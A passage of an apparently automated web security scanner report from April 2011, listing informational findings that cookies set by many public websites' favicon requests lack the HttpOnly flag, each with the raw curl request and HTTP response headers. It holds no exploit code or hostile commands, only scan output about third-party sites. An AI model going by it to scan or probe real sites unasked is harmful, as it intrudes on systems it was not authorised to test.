P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Date: Sat, 02 Apr 2011 13:39:10 GMT
Set-Cookie: BIGipServerdscm_farm=1897179328.0.0000; expires=Sat, 02-Apr-2011 14:39:10 GMT; path=/

..............(.......(....... ...................................D.....................................................................................................................................
...[SNIP]...

14.96. http://www.eharmony.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eharmony.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:19 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 03 Mar 2009 02:00:31 GMT
ETag: "47e-4642d4cc30dc0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2592000
Expires: Mon, 02 May 2011 13:37:19 GMT
Vary: Accept-Encoding
Content-Type: image/x-icon
Set-Cookie: BIGipServerFront=3910078892.16671.0000; path=/
Set-Cookie: lbid=acad40db-aaea-469e-7b2c-2ecabfc46d1a;expires=Thu, 29-Sep-2011 13:37:19 GMT;path=/;domain=.eharmony.com;

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

14.97. http://www.ehealthforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehealthforum.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehealthforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 12:24:47 GMT
ETag: "8e59f3-8be-4578f40dce1c0"
Accept-Ranges: bytes
Content-Length: 2238
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

...... ..............(... ...@.......................................................................................................G.....W....I.U.A............. .....M........... ....(...........
...[SNIP]...

14.98. http://www.emedtv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedtv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.emedtv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:55 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: UT1=173.193.214.243.1301751595155213; path=/; expires=Tue, 30-Mar-21 13:39:55 GMT; domain=.emedtv.com
ETag: W/"1150-1196102204000"
Last-Modified: Mon, 26 Nov 2007 18:36:44 GMT
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

............ .h.......(....... ..... ..........................|m..|m..{k..wf..xk...y...........x..ym..vf..wf..zj..|m..|m..|m..|m..zk..vg......................................yl..wf..{k..|m..{l..vf...
...[SNIP]...

14.99. http://www.epinions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...

14.100. http://www.factmonster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factmonster.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.factmonster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:24 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1301753784017126; path=/; expires=Sun, 01-Apr-12 14:16:24 GMT
Last-Modified: Fri, 26 Jan 2001 16:10:44 GMT
ETag: "13e-37bc85ec86900"
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 14:16:24 GMT
Content-Type: image/vnd.microsoft.icon

..............(.......(....... ...............................................................9#...........Y+.......Z...........................................................................].......
...[SNIP]...

14.101. http://www.familydoctor.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.familydoctor.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familydoctor.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 02 Apr 2011 14:03:17 GMT
Server: Apache
Location: http://familydoctor.org/favicon.ico
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-d0238515=a0a0a66:0; expires=Sat, 02-Apr-11 18:03:17 GMT; path=/
Content-Length: 239

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://familydoctor.org/fa
...[SNIP]...

14.102. http://www.fedex.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedex.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fedex.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 02 Apr 2011 13:24:32 GMT
Content-length: 3638
Content-type: image/x-icon
X-ua-compatible: IE=EmulateIE7
Set-cookie: fdx_cbid=22185494081301750672092920271330; expires=Monday, 18-January-2038 21:14:07 GMT; path=/; domain=.fedex.com
Last-modified: Thu, 14 Feb 2008 18:25:33 GMT
Etag: "e36-47b4879d"

..............h...&... ..............(....... ...........@............................cu...g.....fff......<S..............p...I^......oz...............................................................
...[SNIP]...

14.103. http://www.fool.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fool.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fool.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Sat, 15 Jul 2006 14:05:56 GMT
Accept-Ranges: bytes
ETag: "07a65ca17a8c61:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Sun, 03-Apr-2011 13:35:38 GMT; path=/
Set-Cookie: Tookie=T=04877517183428375666730643888134; domain=.fool.com; expires=Tue, 30-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=8D3DBA4B712DAFA2; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Sat, 02 Apr 2011 13:35:38 GMT
Content-Length: 4710

..............(...F...........h...n... .............. ...........    ..(....... ..........................................................................................................    ..............
...[SNIP]...

14.104. http://www.frontier.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.frontier.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc70bab4cCMYJK; expires=Mon, 2-Apr-2012 14:14:35 GMT; path=/
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Thu, 04 Mar 2010 19:40:47 GMT
Accept-Ranges: bytes
ETag: "80c92496d2bbca1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:43 GMT

..............h.......(....... ...........@.......................MK......:6..>8..@:..D?..HD..WS..c_...~..........8/..91..70..=4..=4..C;..?9..E=..E=..E?..G?..F>..IC..NG..KE..SK..WP..WP..a[..b[..e^..id
...[SNIP]...

14.105. http://www.funbrain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:15 GMT
ETag: "436-3ba36634b1fc0"
Expires: Sat, 02 Apr 2011 13:27:15 GMT
Last-Modified: Tue, 01 Apr 2003 03:28:07 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750835307007; path=/; expires=Sun, 01-Apr-12 13:27:15 GMT; domain=.funbrain.com
Content-Length: 1078
Connection: keep-alive

...[SNIP]...

14.106. http://www.gamehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamehouse.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx-hbnfipvtf

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:37 GMT
Server: Apache/2.2.11 (CentOS)
Last-Modified: Tue, 11 Nov 2008 01:40:48 GMT
ETag: "58b82a5-436-45b5ff805e800"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Sun, 03-Apr-2011 15:07:42 GMT;path=/;domain=gamehouse.com

...[SNIP]...

14.107. http://www.gifts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SERVERID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gifts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Last-Modified: Mon, 15 Jun 2009 23:19:40 GMT
ETag: "66b0-cbe-46c6b4adadb00"
Accept-Ranges: bytes
Content-Length: 3262
Connection: close
Content-Type: image/x-icon
Set-Cookie: SERVERID=web03; path=/
Cache-control: private

...[SNIP]...

14.108. http://www.guardian.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GU_MU

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guardian.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:58 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFRncjZER01BQUJrWkhJMEFBQUhPfDY5VkZuRGVpTVd3ZzBJT0pFbVBrZ0E9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:58 GMT
Last-Modified: Fri, 04 Apr 2008 16:07:11 GMT
Accept-Ranges: bytes
Content-Length: 895
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:31:58 GMT
X-GU-httpd: 06
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

...[SNIP]...

14.109. http://www.guitarcenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ref
ref_d
source
ad_id
orig_ref
orig_ref_d
orig_source
orig_ad_id
uid
IsLoyaltyAvailable

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guitarcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:14:52 GMT
Server: Microsoft-IIS/6.0
ETag:
SN: 28
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=cfhhpohbyrkjmlcxvhr5mdrd; path=/; HttpOnly
Set-Cookie: ref=; path=/
Set-Cookie: ref_d=4/2/2011 10:14:51 AM; path=/
Set-Cookie: source=; path=/
Set-Cookie: ad_id=; path=/
Set-Cookie: orig_ref=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ref_d=4/2/2011 10:14:51 AM; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_source=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: orig_ad_id=; expires=Sat, 16-Apr-2011 14:14:51 GMT; path=/
Set-Cookie: uid=36efd3e4-9a5c-4120-8cc5-e6a569099115; expires=Mon, 02-May-2011 14:14:51 GMT; path=/
Set-Cookie: IsLoyaltyAvailable=False; expires=Mon, 02-May-2011 14:14:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__htmHead"><s
...[SNIP]...

14.110. http://www.gunbroker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gunbroker.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sto-id

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gunbroker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 23 Nov 2010 16:10:33 GMT
Accept-Ranges: bytes
ETag: "8022abf4288bcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:11 GMT
Content-Length: 578
Set-Cookie: sto-id=JGHHNMED; Expires=Tue, 30-Mar-2021 13:53:11 GMT; Path=/

...[SNIP]...

14.111. http://www.healthgrades.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthgrades.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerHealthgrades

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthgrades.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 28454
Content-Type: image/x-icon
Last-Modified: Tue, 17 Mar 2009 16:28:25 GMT
Accept-Ranges: bytes
ETag: "b15990651da7c91:1ab3"
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml",CP="NON DSP COR PSDa OUR NOR UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:11 GMT
Set-Cookie: BIGipServerHealthgrades=1728839690.20480.0000; path=/

...[SNIP]...

14.112. http://www.hi5.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hi5.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_bqq-tfswfst-ofxvj

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hi5.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"5430-1286911046000"
Last-Modified: Tue, 12 Oct 2010 19:17:26 GMT
Content-Length: 5430
Date: Sat, 02 Apr 2011 13:34:01 GMT
Set-Cookie: NSC_bqq-tfswfst-ofxvj=e246bf123660;expires=Sat, 02-Apr-11 14:16:46 GMT;path=/

...[SNIP]...

14.113. http://www.hiexpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID
TLTUID
datacenternode

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hiexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "e6ba-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.hiexpress.com;path=/

...[SNIP]...

14.114. http://www.holidayinn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID
TLTUID
datacenternode

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayinn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "3c877-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.holidayinn.com;path=/

...[SNIP]...

14.115. http://www.hotpads.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotpads.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SRV

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotpads.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Location: http://hotpads.com/favicon.ico
Content-Length: 0
Date: Sat, 02 Apr 2011 14:03:03 GMT
Set-Cookie: SRV=WebHead2; path=/
Cache-control: private


14.116. http://www.hsbccreditcard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsbccreditcard.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WEBTRENDS_ID
LASCCSSA2001US_ID

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsbccreditcard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: ""
Date: Sat, 02 Apr 2011 13:36:20 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301751380.749994; path=/; expires=Tue, 30-Mar-2021 13:36:20 GMT
P3p: CP="CAO COR ADM DEVa TAIa PSA PSD IVAa IVDa CONa HIS OUR LEG CNT"
Expires: Sat, 02 Apr 2011 14:06:20 GMT
Last-modified: Fri, 01 Dec 2006 17:01:18 GMT
Surrogate-control: no-store
Content-language: en-US
Set-cookie: LASCCSSA2001US_ID=0000tCFy4-pMzGldJjX2lZkZUCn:15nk4pohe; Path=/
Cache-control: no-cache="set-cookie, set-cookie2"

...[SNIP]...

14.117. http://www.hsn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hsn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID
TLTHID

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hsn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Wed, 23 Mar 2011 15:23:10 GMT
Accept-Ranges: bytes
ETag: "0c3ad376ee9cb1:1018"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Set-Cookie: TLTHID=1AFFB8CF42502BFE5047CC8E8E254915; domain=.hsn.com; path=/
Date: Sat, 02 Apr 2011 13:35:57 GMT
Content-Length: 894

...[SNIP]...

14.118. http://www.hubspot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hubspot.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hubspot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:38:50 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=W8pkI80nzAEkAAAANTBkMjc1NTgtZmQyNC00MThhLWFhYzEtZmQ1NDcxZDliNjRm0; expires=Sat, 11-Jun-2011 00:18:50 GMT; path=/; HttpOnly
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

...[SNIP]...

14.119. http://www.ichotelsgroup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTSID
TLTUID

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ichotelsgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "4158-57e-4824e228"
Accept-Ranges: bytes
Content-Length: 1406
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

...[SNIP]...

14.120. http://www.imageshack.us/favicon.ico

Summary

